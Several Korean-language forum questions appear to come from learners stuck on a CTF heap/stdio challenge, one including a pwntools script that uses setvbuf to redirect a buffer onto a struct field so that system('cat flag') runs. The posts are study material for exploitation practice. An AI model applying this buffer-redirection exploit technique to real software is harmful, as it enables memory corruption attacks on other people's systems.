이거 도대체 어디가 취약점인가요 아무리 봐도 이해가 안되네요 특히 함수 destroyedBunker 에서 *a1+24에 22222 값을 넣어야 되는데 버퍼를 입력 받는 것이 %lu 로 받아서 버퍼에 overwrite 도 불가능 한 것 같아요.

문제에서 요구하는 사항에 대한 파악과 로직은 이해한 것 같습니다. 다만, malloc을 통해 힙 영역에 할당받은 버퍼의 주소와 포인터를 얼만큼 이동할 지 결정하는 오프셋을 입력받는 것으로 보이는 함수가 있던데, 디버거 없이 어떻게 주소 정보를 파악할 수 있는지 이해가 가지 않습니다. 힙 영역에 할당받은 메모리 주소를 어덯게 파악할 수 있을까요?

제가 생각한 방법입니다. 2번으로 0x400 크기의 메모리를 할당하고 0x22222번 메뉴로 buffer의 주소를 bunker->type의 주소로 변경한다. 다시 2번 메뉴를 선택해서 setvbuf로 버퍼링 전략을 변경된 buffer의 주소로 한다. 마지막으로 1번 메뉴를 통해 [y/N]에서 22222를 입력한다. 디버깅을 통해서 확인한 결과 Bunker->type에 22222이 입력되는 것을 확인했습니다. 그래서 코드를 작성하고 실행한 결과 오류가 발생했습니다. 제가 생각한 방법이 틀렸다고 생각해 질문해 봅니다. 만약 틀린 방법이면 22222를 입력하는 방법을 힌트라도 알려주시면 감사하겠습니다.

**#!/usr/bin/env python3 import sys from pwn import * BINARY_PATH = "./chal" def conn(): if len(sys.argv) == 3: p = remote(sys.argv[1], int(sys.argv[2])) else: p = process(BINARY_PATH) return p p = conn() elf = ELF(BINARY_PATH) p.sendlineafter(b'>> ',b'2') p.sendlineafter(b'>> ',b'1') p.sendlineafter(b'>> ',b'2') buffer = int(p.recvline().split(b': ')[1],16) type = buffer + 0x468 print(hex(buffer)) print(hex(type)) p.sendlineafter(b'>> ',b'1') p.sendlineafter(b'>> ',b'139810') p.sendlineafter(b'buffer: ', f'{int(type)}'.encode()) p.sendlineafter(b'size: ', b'5') p.sendlineafter(b'>> ',b'2') p.sendlineafter(b'>> ',b'0') p.sendlineafter(b'>> ',b'1') p.sendlineafter(b'[y/N]\n',b'2'*5) p.interactive()** 안녕하세요 해당 문제를 풀기위해서는 setvbuf를 이용해서 풀어야한다는 점은 알고 있습니다. 다만 setvbuf에 대해서 자세히는 모르지만 디버깅을 통해 최종적으로 long type;에 (0x3232323232)22222를 넣는 방법을 찾았습니다. if(this->type && !strcmp ((char*)(this->type), YELLOW_WIN)) system("cat flag"); 해당 조건문을 통과해 최종적으로 플래그를 찾는것을 목표로하고 있습니다. 그러나 Bunker->long type에 22222를 넣어도 조건문이 통과하지 않습니다. 나름 찾은 이유는 비교문 strcmp함수에 RSI RDI에서 생각대로 레지스터에 담기질 않는것 같습니다. 나름대로 이유는 열심히 찾았지만 그 원인이 먼지 잘 모르겠습니다... 해당 문제를 풀 수 있게 지혜를 주셨으면 좋겠습니다. 감사합니다. (__)